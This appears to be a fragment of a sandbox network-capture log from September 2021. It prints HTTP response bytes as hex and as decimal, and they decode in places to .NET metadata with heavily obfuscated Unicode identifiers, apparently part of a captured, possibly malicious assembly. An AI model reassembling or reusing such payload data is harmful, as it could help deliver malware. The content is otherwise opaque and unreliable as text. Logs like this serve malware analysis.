                                                                                              2021-09-27 18:28:01 UTC4004INData Raw: 35 35 20 33 34 20 33 39 20 31 30 30 20 31 38 30 20 32 31 34 20 35 30 20 31 39 20 37 37 20 32 33 36 20 39 33 20 31 33 36 20 31 36 31 20 31 38 32 20 31 33 20 32 32 30 20 32 35 30 20 31 30 32 20 31 31 36 20 32 34 31 20 35 33 20 31 34 35 20 35 33 20 36 31 20 31 38 30 20 33 30 20 32 34 37 20 32 35 30 20 32 31 32 20 31 34 36 20 31 34 33 20 31 38 38 20 31 33 39 20 32 34 39 20 32 34 33 20 33 37 20 34 39 20 31 31 33 20 39 39 20 33 34 20 31 36 35 20 34 39 20 31 34 38 20 35 33 20 31 37 20 34 33 20 31 35 35 20 31 31 34 20 36 31 20 32 32 36 20 32 31 39 20 31 31 37 20 34 36 20 31 33 35 20 36 31 20 31 35 33 20 31 31 30 20 31 35 37 20 31 35 39 20 31 35 37 20 31 34 37 20 38 30 20 31 35 33 20 33 33 20 32 35 32 20 31 32 31 20 32 33 38 20 35 33 20 31 31 31 20 32 31 30 20 31
                                                                                              Data Ascii: 55 34 39 100 180 214 50 19 77 236 93 136 161 182 13 220 250 102 116 241 53 145 53 61 180 30 247 250 212 146 143 188 139 249 243 37 49 113 99 34 165 49 148 53 17 43 155 114 61 226 219 117 46 135 61 153 110 157 159 157 147 80 153 33 252 121 238 53 111 210 1
                                                                                              2021-09-27 18:28:01 UTC4020INData Raw: 39 20 32 35 33 20 34 37 20 32 35 32 20 32 33 37 20 31 35 32 20 34 31 20 31 31 32 20 38 34 20 35 36 20 31 34 30 20 31 32 38 20 32 20 34 31 20 33 31 20 32 39 20 31 33 39 20 31 38 31 20 31 36 33 20 31 30 34 20 31 33 31 20 32 30 20 33 30 20 32 30 36 20 34 39 20 35 32 20 39 35 20 31 33 36 20 34 31 20 32 34 36 20 39 38 20 31 38 33 20 32 32 35 20 34 34 20 34 35 20 31 35 35 20 32 35 20 32 31 38 20 31 31 33 20 35 20 31 30 36 20 32 32 35 20 32 31 37 20 31 35 38 20 32 31 32 20 31 37 38 20 31 36 20 32 35 32 20 32 37 20 35 35 20 31 30 31 20 37 38 20 39 39 20 35 20 31 33 34 20 38 32 20 31 38 39 20 31 38 36 20 32 34 39 20 31 38 32 20 35 37 20 31 39 37 20 31 34 31 20 32 34 36 20 31 39 39 20 32 36 20 30 20 31 38 39 20 33 20 32 34 20 31 36 36 20 39 31 20 31 33 20 31 34 38
                                                                                              Data Ascii: 9 253 47 252 237 152 41 112 84 56 140 128 2 41 31 29 139 181 163 104 131 20 30 206 49 52 95 136 41 246 98 183 225 44 45 155 25 218 113 5 106 225 217 158 212 178 16 252 27 55 101 78 99 5 134 82 189 186 249 182 57 197 141 246 199 26 0 189 3 24 166 91 13 148
                                                                                              2021-09-27 18:28:01 UTC4036INData Raw: 36 35 20 31 37 36 20 32 32 34 20 31 34 36 20 31 31 20 32 30 20 34 20 32 31 30 20 31 35 32 20 33 37 20 32 33 32 20 32 31 33 20 32 33 38 20 35 31 20 31 38 38 20 34 38 20 32 35 35 20 32 34 20 32 32 20 31 35 36 20 35 35 20 33 36 20 31 36 39 20 39 30 20 31 31 36 20 31 35 37 20 31 31 38 20 31 32 35 20 32 33 37 20 39 31 20 31 30 36 20 38 35 20 38 32 20 34 39 20 37 37 20 31 38 34 20 31 38 37 20 31 38 35 20 37 39 20 38 30 20 32 35 33 20 31 36 38 20 31 39 38 20 31 35 30 20 31 33 35 20 31 30 32 20 37 37 20 31 36 34 20 31 32 38 20 31 39 34 20 31 37 37 20 31 37 36 20 31 39 20 32 33 39 20 31 33 30 20 31 30 31 20 31 35 20 32 35 31 20 33 31 20 31 36 39 20 32 33 34 20 36 36 20 31 33 38 20 32 32 38 20 31 30 37 20 31 33 37 20 31 37 39 20 39 32 20 31 39 39 20 32 36 20 31 30
                                                                                              Data Ascii: 65 176 224 146 11 20 4 210 152 37 232 213 238 51 188 48 255 24 22 156 55 36 169 90 116 157 118 125 237 91 106 85 82 49 77 184 187 185 79 80 253 168 198 150 135 102 77 164 128 194 177 176 19 239 130 101 15 251 31 169 234 66 138 228 107 137 179 92 199 26 10
                                                                                              2021-09-27 18:28:01 UTC4052INData Raw: 32 20 31 32 36 20 31 30 38 20 37 32 20 32 38 20 33 31 20 31 38 34 20 31 30 30 20 31 30 37 20 31 37 31 20 32 34 33 20 38 30 20 36 20 32 34 30 20 31 34 20 35 20 38 32 20 31 38 38 20 39 36 20 32 33 36 20 31 35 32 20 31 33 30 20 32 30 31 20 31 37 39 20 37 31 20 37 37 20 35 35 20 34 32 20 31 30 34 20 31 35 30 20 32 34 20 34 39 20 31 32 20 31 36 36 20 31 39 35 20 32 31 33 20 31 38 31 20 31 31 31 20 32 34 38 20 32 32 32 20 32 33 34 20 38 31 20 36 33 20 33 33 20 32 33 32 20 32 32 20 31 39 38 20 31 33 37 20 31 31 20 36 20 32 31 39 20 39 38 20 31 37 36 20 32 31 33 20 32 34 32 20 37 30 20 31 36 33 20 32 34 20 37 32 20 31 37 38 20 33 31 20 31 33 35 20 31 32 30 20 31 38 20 37 31 20 38 37 20 31 37 33 20 32 33 34 20 39 35 20 32 32 34 20 35 20 31 36 30 20 31 31 37 20 31
                                                                                              Data Ascii: 2 126 108 72 28 31 184 100 107 171 243 80 6 240 14 5 82 188 96 236 152 130 201 179 71 77 55 42 104 150 24 49 12 166 195 213 181 111 248 222 234 81 63 33 232 22 198 137 11 6 219 98 176 213 242 70 163 24 72 178 31 135 120 18 71 87 173 234 95 224 5 160 117 1
                                                                                              2021-09-27 18:28:01 UTC4068INData Raw: 20 33 30 20 32 34 37 20 32 30 30 20 38 39 20 31 30 33 20 32 33 37 20 32 32 20 31 32 37 20 31 35 38 20 31 36 30 20 36 37 20 38 35 20 31 38 30 20 34 31 20 32 32 34 20 32 34 33 20 31 30 35 20 32 35 33 20 32 33 20 32 32 20 32 33 33 20 34 20 31 35 35 20 32 35 31 20 31 36 35 20 35 31 20 32 32 30 20 38 34 20 34 20 36 30 20 31 32 31 20 32 30 30 20 32 33 35 20 32 31 30 20 38 33 20 36 37 20 32 33 30 20 31 38 31 20 36 37 20 32 20 32 35 20 33 38 20 38 32 20 38 32 20 31 31 20 31 38 30 20 31 34 39 20 31 31 39 20 34 38 20 32 33 38 20 31 34 35 20 32 36 20 37 34 20 36 30 20 32 35 34 20 32 35 32 20 31 36 32 20 31 34 35 20 34 20 34 39 20 36 20 32 30 34 20 31 37 34 20 32 31 30 20 31 39 20 31 38 37 20 32 31 35 20 32 32 31 20 32 34 33 20 31 32 34 20 32 31 30 20 31 37 37 20 32
                                                                                              Data Ascii: 30 247 200 89 103 237 22 127 158 160 67 85 180 41 224 243 105 253 23 22 233 4 155 251 165 51 220 84 4 60 121 200 235 210 83 67 230 181 67 2 25 38 82 82 11 180 149 119 48 238 145 26 74 60 254 252 162 145 4 49 6 204 174 210 19 187 215 221 243 124 210 177 2
                                                                                              2021-09-27 18:28:01 UTC4084INData Raw: 34 20 33 20 39 35 20 32 35 34 20 31 32 20 31 20 30 20 33 32 20 30 20 30 20 30 20 30 20 32 35 34 20 31 20 39 35 20 32 35 34 20 31 37 20 31 31 36 20 35 30 20 30 20 30 20 31 20 34 30 20 31 36 20 30 20 30 20 31 30 20 32 32 31 20 31 35 33 20 32 35 35 20 32 35 35 20 32 35 35 20 33 32 20 35 31 20 30 20 31 30 20 31 32 38 20 34 30 20 31 37 20 30 20 30 20 31 30 20 31 32 32 20 32 35 34 20 31 32 20 31 20 30 20 35 37 20 36 20 30 20 30 20 30 20 34 30 20 31 34 20 30 20 30 20 31 30 20 30 20 34 32 20 31 20 31 36 20 30 20 30 20 31 20 30 20 36 20 30 20 31 39 30 20 32 33 30 20 30 20 31 35 20 31 39 36 20 30 20 30 20 30 20 32 37 20 34 38 20 31 31 20 30 20 39 35 20 32 20 30 20 30 20 39 20 30 20 30 20 31 37 20 31 34 30 20 34 35 20 30 20 30 20 31 20 30 20 30 20 34 30 20 31 34 20
                                                                                              Data Ascii: 4 3 95 254 12 1 0 32 0 0 0 0 254 1 95 254 17 116 50 0 0 1 40 16 0 0 10 221 153 255 255 255 32 51 0 10 128 40 17 0 0 10 122 254 12 1 0 57 6 0 0 0 40 14 0 0 10 0 42 1 16 0 0 1 0 6 0 190 230 0 15 196 0 0 0 27 48 11 0 95 2 0 0 9 0 0 17 140 45 0 0 1 0 0 40 14
                                                                                              2021-09-27 18:28:01 UTC4100INData Raw: 20 35 36 20 31 32 30 20 36 20 30 20 30 20 30 20 30 20 33 32 20 32 30 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 31 31 34 20 31 31 37 20 34 20 34 20 31 31 32 20 31 31 34 20 32 33 39 20 33 20 34 20 31 31 32 20 34 30 20 32 35 20 30 20 30 20 36 20 31 31 34 20 32 34 31 20 33 20 34 20 31 31 32 20 33 32 20 30 20 30 20 30 20 30 20 34 30 20 37 30 20 30 20 30 20 31 30 20 33 32 20 30 20 30 20 30 20 30 20 32 35 34 20 31 20 32 35 34 20 31 34 20 31 32 20 30 20 32 35 34 20 31 32 20 31 32 20 30 20 35 37 20 32 34 20 30 20 30 20 30 20 33 32 20 32 31 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 33 32 20 31 20 30 20 30 20 30 20 32 35 34 20 31 34 20 30 20 30 20 35 36 20 33 36 20 36 20 30 20 30 20 30 20 30 20 33 32 20 32 33 20 30 20 30 20 30 20 32 35 34 20
                                                                                              Data Ascii: 56 120 6 0 0 0 0 32 20 0 0 0 254 14 3 0 114 117 4 4 112 114 239 3 4 112 40 25 0 0 6 114 241 3 4 112 32 0 0 0 0 40 70 0 0 10 32 0 0 0 0 254 1 254 14 12 0 254 12 12 0 57 24 0 0 0 32 21 0 0 0 254 14 3 0 32 1 0 0 0 254 14 0 0 56 36 6 0 0 0 0 32 23 0 0 0 254
                                                                                              2021-09-27 18:28:01 UTC4116INData Raw: 30 20 36 39 20 32 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 31 36 32 20 32 35 35 20 32 35 35 20 32 35 35 20 32 32 31 20 34 39 20 30 20 30 20 30 20 31 31 37 20 35 30 20 30 20 30 20 31 20 32 30 20 32 35 34 20 33 20 32 35 34 20 31 32 20 31 20 30 20 33 32 20 30 20 30 20 30 20 30 20 32 35 34 20 33 20 39 35 20 32 35 34 20 31 32 20 32 20 30 20 33 32 20 30 20 30 20 30 20 30 20 32 35 34 20 31 20 39 35 20 32 35 34 20 31 37 20 31 31 36 20 35 30 20 30 20 30 20 31 20 34 30 20 31 36 20 30 20 30 20 31 30 20 32 32 31 20 31 35 33 20 32 35 35 20 32 35 35 20 32 35 35 20 33 32 20 35 31 20 30 20 31 30 20 31 32 38 20 34 30 20 31 37 20 30 20 30 20 31 30 20 31 32 32 20 32 35 34 20 31 32 20 32 20 30 20 35 37 20 36 20 30 20 30 20 30 20 34 30 20 31 34 20 30 20 30 20 31 30 20 30
                                                                                              Data Ascii: 0 69 2 0 0 0 0 0 0 0 162 255 255 255 221 49 0 0 0 117 50 0 0 1 20 254 3 254 12 1 0 32 0 0 0 0 254 3 95 254 12 2 0 32 0 0 0 0 254 1 95 254 17 116 50 0 0 1 40 16 0 0 10 221 153 255 255 255 32 51 0 10 128 40 17 0 0 10 122 254 12 2 0 57 6 0 0 0 40 14 0 0 10 0
                                                                                              2021-09-27 18:28:01 UTC4132INData Raw: 32 20 33 20 30 20 30 20 30 20 33 31 20 39 39 20 31 35 37 20 33 37 20 32 35 20 33 31 20 35 34 20 31 35 37 20 33 37 20 33 32 20 32 20 30 20 30 20 30 20 33 31 20 39 38 20 31 35 37 20 33 37 20 33 32 20 32 20 30 20 30 20 30 20 33 31 20 35 34 20 31 35 37 20 33 37 20 33 32 20 32 20 30 20 30 20 30 20 33 31 20 35 37 20 31 35 37 20 33 37 20 32 34 20 33 31 20 31 31 39 20 31 35 37 20 33 37 20 33 32 20 31 20 30 20 30 20 30 20 33 31 20 39 37 20 31 35 37 20 33 37 20 33 32 20 31 20 30 20 30 20 30 20 33 31 20 31 30 30 20 31 35 37 20 33 37 20 33 32 20 31 20 30 20 30 20 30 20 33 31 20 39 37 20 31 35 37 20 33 37 20 32 33 20 33 31 20 31 31 31 20 31 35 37 20 33 37 20 33 32 20 30 20 30 20 30 20 30 20 33 31 20 39 39 20 31 35 37 20 33 37 20 33 32 20 30 20 30 20 30 20 30 20 33 31
                                                                                              Data Ascii: 2 3 0 0 0 31 99 157 37 25 31 54 157 37 32 2 0 0 0 31 98 157 37 32 2 0 0 0 31 54 157 37 32 2 0 0 0 31 57 157 37 24 31 119 157 37 32 1 0 0 0 31 97 157 37 32 1 0 0 0 31 100 157 37 32 1 0 0 0 31 97 157 37 23 31 111 157 37 32 0 0 0 0 31 99 157 37 32 0 0 0 0 31
                                                                                              2021-09-27 18:28:01 UTC4148INData Raw: 31 30 20 35 38 20 31 36 38 20 32 35 35 20 32 35 35 20 32 35 35 20 32 32 31 20 31 39 20 30 20 30 20 30 20 32 35 34 20 31 32 20 33 20 30 20 35 37 20 39 20 30 20 30 20 30 20 32 35 34 20 31 32 20 33 20 30 20 31 31 31 20 33 34 20 30 20 30 20 31 30 20 32 32 30 20 32 35 34 20 31 32 20 30 20 30 20 33 32 20 34 31 20 30 20 30 20 30 20 31 31 31 20 32 30 39 20 30 20 30 20 31 30 20 33 38 20 32 35 34 20 31 32 20 30 20 30 20 31 31 31 20 31 39 20 30 20 30 20 31 30 20 34 32 20 31 20 31 36 20 30 20 30 20 32 20 30 20 39 34 20 30 20 39 38 20 31 39 32 20 30 20 31 39 20 30 20 30 20 30 20 30 20 31 39 20 34 38 20 32 20 30 20 32 35 32 20 30 20 30 20 30 20 34 35 20 30 20 30 20 31 37 20 32 35 34 20 39 20 31 20 30 20 34 30 20 31 39 30 20 30 20 30 20 31 30 20 32 35 34 20 31 34 20 30
                                                                                              Data Ascii: 10 58 168 255 255 255 221 19 0 0 0 254 12 3 0 57 9 0 0 0 254 12 3 0 111 34 0 0 10 220 254 12 0 0 32 41 0 0 0 111 209 0 0 10 38 254 12 0 0 111 19 0 0 10 42 1 16 0 0 2 0 94 0 98 192 0 19 0 0 0 0 19 48 2 0 252 0 0 0 45 0 0 17 254 9 1 0 40 190 0 0 10 254 14 0
                                                                                              2021-09-27 18:28:01 UTC4164INData Raw: 39 20 31 31 37 20 32 20 38 36 20 31 32 38 20 39 31 20 35 38 20 31 31 37 20 32 20 38 36 20 31 32 38 20 31 39 20 39 38 20 31 31 37 20 32 20 38 36 20 31 32 38 20 34 37 20 31 31 37 20 31 31 37 20 32 20 38 36 20 31 32 38 20 31 35 39 20 31 33 31 20 31 31 37 20 32 20 38 36 20 31 32 38 20 31 36 30 20 31 31 35 20 31 31 37 20 32 20 38 36 20 31 32 38 20 31 36 33 20 31 34 35 20 31 31 37 20 32 20 38 36 20 31 32 38 20 31 33 37 20 35 38 20 31 31 37 20 32 20 38 36 20 31 32 38 20 39 35 20 31 33 37 20 31 31 37 20 32 20 38 36 20 31 32 38 20 35 37 20 34 31 20 31 31 37 20 32 20 38 36 20 31 32 38 20 31 38 30 20 31 32 39 20 31 31 37 20 32 20 38 36 20 31 32 38 20 31 34 33 20 38 32 20 31 31 37 20 32 20 38 36 20 31 32 38 20 32 31 30 20 36 37 20 31 31 37 20 32 20 38 36 20 31 32 38
                                                                                              Data Ascii: 9 117 2 86 128 91 58 117 2 86 128 19 98 117 2 86 128 47 117 117 2 86 128 159 131 117 2 86 128 160 115 117 2 86 128 163 145 117 2 86 128 137 58 117 2 86 128 95 137 117 2 86 128 57 41 117 2 86 128 180 129 117 2 86 128 143 82 117 2 86 128 210 67 117 2 86 128
                                                                                              2021-09-27 18:28:01 UTC4180INData Raw: 37 32 20 31 38 20 31 31 33 20 30 20 36 35 20 31 20 31 37 32 20 31 38 20 31 31 33 20 30 20 37 33 20 31 20 31 37 32 20 31 38 20 31 31 33 20 30 20 38 31 20 31 20 31 37 32 20 31 38 20 32 33 33 20 31 33 20 39 37 20 31 20 31 37 32 20 31 38 20 31 31 33 20 30 20 31 31 33 20 31 20 37 35 20 31 38 20 31 20 30 20 31 32 31 20 31 20 33 35 20 31 32 20 31 20 31 34 20 31 31 33 20 31 20 39 33 20 31 38 20 37 20 31 34 20 31 31 33 20 31 20 35 36 20 31 38 20 31 34 20 31 34 20 31 35 33 20 31 20 32 38 20 34 20 34 31 20 31 34 20 31 37 20 30 20 36 36 20 31 32 20 32 33 32 20 30 20 31 36 39 20 31 20 31 38 20 32 32 20 38 34 20 30 20 31 37 37 20 31 20 31 31 38 20 31 32 20 31 33 33 20 30 20 31 36 39 20 31 20 32 35 20 32 32 20 34 37 20 31 34 20 31 38 35 20 31 20 31 38 38 20 32 35 20 35
                                                                                              Data Ascii: 72 18 113 0 65 1 172 18 113 0 73 1 172 18 113 0 81 1 172 18 233 13 97 1 172 18 113 0 113 1 75 18 1 0 121 1 35 12 1 14 113 1 93 18 7 14 113 1 56 18 14 14 153 1 28 4 41 14 17 0 66 12 232 0 169 1 18 22 84 0 177 1 118 12 133 0 169 1 25 22 47 14 185 1 188 25 5
                                                                                              2021-09-27 18:28:01 UTC4196INData Raw: 20 32 34 20 30 20 33 34 20 30 20 32 34 20 30 20 33 35 20 30 20 32 34 20 30 20 33 36 20 30 20 32 34 20 30 20 33 38 20 30 20 33 37 20 30 20 34 36 20 30 20 34 35 20 30 20 34 37 20 30 20 34 35 20 30 20 34 38 20 30 20 34 35 20 30 20 30 20 30 20 31 36 20 30 20 31 36 20 30 20 31 38 33 20 32 20 30 20 30 20 31 36 20 30 20 39 35 20 30 20 32 33 34 20 32 20 30 20 30 20 30 20 30 20 39 37 20 30 20 31 32 35 20 30 20 30 20 30 20 30 20 30 20 31 30 39 20 30 20 31 33 38 20 31 20 30 20 30 20 30 20 30 20 31 33 39 20 30 20 32 34 32 20 32 33 20 31 37 20 31 20 31 33 20 31 37 20 31 37 20 31 20 33 34 20 31 37 20 32 33 20 31 20 31 33 20 31 37 20 31 33 38 20 30 20 39 20 31 38 20 31 36 31 20 31 20 35 39 20 31 39 20 31 36 31 20 31 20 37 30 20 31 39 20 31 36 31 20 31 20 38 31 20 31 39
                                                                                              Data Ascii: 24 0 34 0 24 0 35 0 24 0 36 0 24 0 38 0 37 0 46 0 45 0 47 0 45 0 48 0 45 0 0 0 16 0 16 0 183 2 0 0 16 0 95 0 234 2 0 0 0 0 97 0 125 0 0 0 0 0 109 0 138 1 0 0 0 0 139 0 242 23 17 1 13 17 17 1 34 17 23 1 13 17 138 0 9 18 161 1 59 19 161 1 70 19 161 1 81 19
                                                                                              2021-09-27 18:28:01 UTC4212INData Raw: 20 31 31 36 20 31 30 31 20 31 31 34 20 31 31 32 20 31 31 34 20 31 30 35 20 31 31 35 20 31 30 31 20 38 33 20 31 30 31 20 31 31 34 20 31 31 38 20 31 30 35 20 39 39 20 31 30 31 20 31 31 35 20 37 32 20 31 30 31 20 31 30 38 20 31 31 32 20 31 30 31 20 31 31 34 20 30 20 38 34 20 31 31 31 20 38 35 20 31 31 32 20 31 31 32 20 31 30 31 20 31 31 34 20 30 20 36 37 20 31 31 37 20 31 31 34 20 31 31 34 20 31 30 31 20 31 31 30 20 31 31 36 20 38 35 20 31 31 35 20 31 30 31 20 31 31 34 20 30 20 38 34 20 31 31 31 20 37 31 20 31 30 31 20 31 31 30 20 31 30 31 20 31 31 34 20 31 30 35 20 39 39 20 38 30 20 39 37 20 31 31 34 20 39 37 20 31 30 39 20 31 30 31 20 31 31 36 20 31 30 31 20 31 31 34 20 30 20 37 31 20 31 30 31 20 31 31 36 20 36 38 20 31 30 31 20 31 30 38 20 31 30 31 20 31
                                                                                              Data Ascii: 116 101 114 112 114 105 115 101 83 101 114 118 105 99 101 115 72 101 108 112 101 114 0 84 111 85 112 112 101 114 0 67 117 114 114 101 110 116 85 115 101 114 0 84 111 71 101 110 101 114 105 99 80 97 114 97 109 101 116 101 114 0 71 101 116 68 101 108 101 1
                                                                                              2021-09-27 18:28:01 UTC4228INData Raw: 33 31 20 32 31 37 20 31 33 32 20 32 31 37 20 31 37 33 20 32 31 37 20 31 37 37 20 32 31 37 20 31 34 34 20 32 31 37 20 31 35 35 20 32 31 36 20 31 38 37 20 32 31 37 20 31 33 31 20 30 20 32 33 33 20 31 32 39 20 31 33 31 20 32 33 33 20 31 33 30 20 31 33 39 20 32 33 33 20 31 32 39 20 31 33 34 20 32 33 33 20 31 32 39 20 31 37 32 20 32 33 33 20 31 32 39 20 31 33 39 20 32 33 33 20 31 32 39 20 31 38 39 20 32 33 33 20 31 33 30 20 31 33 31 20 32 33 33 20 31 32 39 20 31 38 35 20 32 33 33 20 31 32 39 20 31 34 30 20 32 33 33 20 31 32 39 20 31 33 39 20 32 33 33 20 31 32 39 20 31 36 34 20 32 33 33 20 31 32 39 20 31 33 39 20 32 33 33 20 31 32 39 20 31 33 31 20 32 33 33 20 31 32 39 20 31 33 31 20 32 33 33 20 31 32 39 20 31 33 32 20 30 20 32 33 35 20 31 33 30 20 31 35 36 20
                                                                                              Data Ascii: 31 217 132 217 173 217 177 217 144 217 155 216 187 217 131 0 233 129 131 233 130 139 233 129 134 233 129 172 233 129 139 233 129 189 233 130 131 233 129 185 233 129 140 233 129 139 233 129 164 233 129 139 233 129 131 233 129 131 233 129 132 0 235 130 156
                                                                                              2021-09-27 18:28:01 UTC4244INData Raw: 20 31 34 39 20 31 36 39 20 32 32 37 20 31 34 38 20 31 38 39 20 32 32 37 20 31 34 39 20 31 32 38 20 32 32 37 20 31 34 39 20 31 37 30 20 32 32 37 20 31 34 39 20 31 33 39 20 30 20 32 33 35 20 31 35 32 20 31 38 30 20 32 33 35 20 31 35 32 20 31 33 34 20 32 33 35 20 31 35 32 20 31 33 31 20 32 33 35 20 31 35 32 20 31 33 38 20 32 33 35 20 31 35 32 20 31 33 34 20 32 33 35 20 31 35 32 20 31 38 34 20 32 33 35 20 31 35 32 20 31 33 30 20 32 33 35 20 31 35 32 20 31 33 38 20 32 33 35 20 31 35 32 20 31 38 39 20 32 33 35 20 31 35 32 20 31 37 39 20 32 33 35 20 31 35 32 20 31 33 36 20 32 33 35 20 31 35 33 20 31 33 37 20 32 33 35 20 31 35 32 20 31 33 31 20 32 33 35 20 31 35 32 20 31 35 35 20 32 33 35 20 31 35 32 20 31 33 39 20 30 20 32 33 31 20 31 35 32 20 31 38 32 20 32 33
                                                                                              Data Ascii: 149 169 227 148 189 227 149 128 227 149 170 227 149 139 0 235 152 180 235 152 134 235 152 131 235 152 138 235 152 134 235 152 184 235 152 130 235 152 138 235 152 189 235 152 179 235 152 136 235 153 137 235 152 131 235 152 155 235 152 139 0 231 152 182 23
                                                                                              2021-09-27 18:28:01 UTC4260INData Raw: 34 37 20 31 34 34 20 32 33 37 20 31 34 36 20 31 37 37 20 32 33 37 20 31 34 36 20 31 36 34 20 32 33 37 20 31 34 37 20 31 34 38 20 32 33 37 20 31 34 37 20 31 34 37 20 32 33 37 20 31 34 36 20 31 38 35 20 32 33 37 20 31 34 36 20 31 36 35 20 32 33 37 20 31 34 36 20 31 36 38 20 32 33 37 20 31 34 36 20 31 36 37 20 32 33 37 20 31 34 37 20 31 34 35 20 30 20 32 33 36 20 31 36 30 20 31 38 39 20 32 33 36 20 31 36 31 20 31 37 34 20 32 33 36 20 31 36 31 20 31 32 38 20 32 33 36 20 31 36 30 20 31 38 38 20 32 33 36 20 31 36 30 20 31 38 39 20 32 33 36 20 31 36 30 20 31 38 35 20 32 33 36 20 31 36 31 20 31 38 31 20 32 33 36 20 31 36 31 20 31 32 38 20 32 33 36 20 31 36 32 20 31 32 38 20 32 33 36 20 31 36 31 20 31 35 34 20 32 33 36 20 31 36 31 20 31 35 33 20 32 33 36 20 31 36
                                                                                              Data Ascii: 47 144 237 146 177 237 146 164 237 147 148 237 147 147 237 146 185 237 146 165 237 146 168 237 146 167 237 147 145 0 236 160 189 236 161 174 236 161 128 236 160 188 236 160 189 236 160 185 236 161 181 236 161 128 236 162 128 236 161 154 236 161 153 236 16
                                                                                              2021-09-27 18:28:01 UTC4276INData Raw: 20 31 33 32 20 32 33 36 20 31 37 35 20 31 36 37 20 32 33 36 20 31 37 34 20 31 37 39 20 32 33 36 20 31 37 35 20 31 33 35 20 32 33 36 20 31 37 35 20 31 37 33 20 32 33 36 20 31 37 35 20 31 33 36 20 32 33 36 20 31 37 35 20 31 36 32 20 32 33 36 20 31 37 34 20 31 38 35 20 32 33 36 20 31 37 35 20 31 36 36 20 32 33 36 20 31 37 35 20 31 35 32 20 30 20 32 32 35 20 31 37 36 20 31 35 31 20 32 32 35 20 31 37 36 20 31 33 33 20 32 32 35 20 31 37 36 20 31 38 32 20 32 32 35 20 31 37 36 20 31 36 39 20 32 32 35 20 31 37 36 20 31 38 32 20 32 32 35 20 31 37 36 20 31 35 31 20 32 32 35 20 31 37 37 20 31 33 33 20 32 32 35 20 31 37 37 20 31 33 31 20 32 32 35 20 31 37 36 20 31 33 31 20 32 32 35 20 31 37 36 20 31 33 31 20 32 32 35 20 31 37 36 20 31 33 37 20 32 32 35 20 31 37 36 20
                                                                                              Data Ascii: 132 236 175 167 236 174 179 236 175 135 236 175 173 236 175 136 236 175 162 236 174 185 236 175 166 236 175 152 0 225 176 151 225 176 133 225 176 182 225 176 169 225 176 182 225 176 151 225 177 133 225 177 131 225 176 131 225 176 131 225 176 137 225 176
                                                                                              2021-09-27 18:28:01 UTC4292INData Raw: 35 37 20 32 33 39 20 31 33 30 20 31 34 37 20 32 33 39 20 31 33 30 20 31 35 39 20 32 33 39 20 31 32 39 20 31 37 37 20 32 33 39 20 31 32 39 20 31 37 33 20 32 33 39 20 31 33 30 20 31 34 35 20 32 33 39 20 31 32 39 20 31 38 38 20 32 33 39 20 31 32 39 20 31 37 39 20 32 33 39 20 31 32 39 20 31 37 30 20 32 33 39 20 31 33 30 20 31 36 30 20 30 20 32 33 38 20 31 33 32 20 31 34 30 20 32 33 38 20 31 33 32 20 31 38 36 20 32 33 38 20 31 33 33 20 31 33 32 20 32 33 38 20 31 33 32 20 31 36 32 20 32 33 38 20 31 33 33 20 31 33 31 20 32 33 38 20 31 33 32 20 31 38 35 20 32 33 38 20 31 33 32 20 31 34 30 20 32 33 38 20 31 33 32 20 31 38 31 20 32 33 38 20 31 33 33 20 31 33 32 20 32 33 38 20 31 33 32 20 31 33 36 20 32 33 38 20 31 33 32 20 31 33 36 20 32 33 38 20 31 33 32 20 31 33
                                                                                              Data Ascii: 57 239 130 147 239 130 159 239 129 177 239 129 173 239 130 145 239 129 188 239 129 179 239 129 170 239 130 160 0 238 132 140 238 132 186 238 133 132 238 132 162 238 133 131 238 132 185 238 132 140 238 132 181 238 133 132 238 132 136 238 132 136 238 132 13
                                                                                              2021-09-27 18:28:01 UTC4308INData Raw: 32 35 20 31 35 38 20 31 34 38 20 32 32 35 20 31 35 38 20 31 34 38 20 32 32 35 20 31 35 37 20 31 35 39 20 32 32 35 20 31 35 37 20 31 36 37 20 32 32 35 20 31 35 38 20 31 36 36 20 32 32 35 20 31 35 37 20 31 36 31 20 32 32 35 20 31 35 37 20 31 36 32 20 32 32 35 20 31 35 38 20 31 34 37 20 32 32 35 20 31 35 37 20 31 36 36 20 30 20 32 33 32 20 31 36 30 20 31 36 37 20 32 33 32 20 31 36 30 20 31 35 34 20 32 33 32 20 31 35 39 20 31 38 38 20 32 33 32 20 31 36 30 20 31 37 31 20 32 33 32 20 31 35 39 20 31 36 39 20 32 33 32 20 31 36 30 20 31 34 39 20 32 33 32 20 31 36 30 20 31 33 35 20 32 33 32 20 31 35 39 20 31 36 37 20 32 33 32 20 31 35 39 20 31 36 37 20 32 33 32 20 31 35 39 20 31 36 37 20 32 33 32 20 31 35 39 20 31 36 35 20 32 33 32 20 31 35 39 20 31 38 37 20 32 33
                                                                                              Data Ascii: 25 158 148 225 158 148 225 157 159 225 157 167 225 158 166 225 157 161 225 157 162 225 158 147 225 157 166 0 232 160 167 232 160 154 232 159 188 232 160 171 232 159 169 232 160 149 232 160 135 232 159 167 232 159 167 232 159 167 232 159 165 232 159 187 23
                                                                                              2021-09-27 18:28:01 UTC4324INData Raw: 20 31 33 31 20 31 38 34 20 32 32 35 20 31 33 31 20 31 33 35 20 32 32 35 20 31 33 31 20 31 34 33 20 32 32 35 20 31 33 31 20 31 38 36 20 32 32 35 20 31 33 32 20 31 33 31 20 32 32 35 20 31 33 31 20 31 33 38 20 32 32 35 20 31 33 32 20 31 32 39 20 32 32 35 20 31 33 31 20 31 38 39 20 32 32 35 20 31 33 31 20 31 37 35 20 30 20 32 33 39 20 31 33 35 20 31 34 38 20 32 33 39 20 31 33 35 20 31 37 30 20 32 33 39 20 31 33 35 20 31 34 35 20 32 33 39 20 31 33 36 20 31 33 30 20 32 33 39 20 31 33 35 20 31 39 31 20 32 33 39 20 31 33 35 20 31 34 38 20 32 33 39 20 31 33 35 20 31 34 33 20 32 33 39 20 31 33 35 20 31 38 32 20 32 33 39 20 31 33 35 20 31 34 33 20 32 33 39 20 31 33 35 20 31 34 35 20 32 33 39 20 31 33 35 20 31 38 31 20 32 33 39 20 31 33 35 20 31 34 32 20 32 33 39 20
                                                                                              Data Ascii: 131 184 225 131 135 225 131 143 225 131 186 225 132 131 225 131 138 225 132 129 225 131 189 225 131 175 0 239 135 148 239 135 170 239 135 145 239 136 130 239 135 191 239 135 148 239 135 143 239 135 182 239 135 143 239 135 145 239 135 181 239 135 142 239
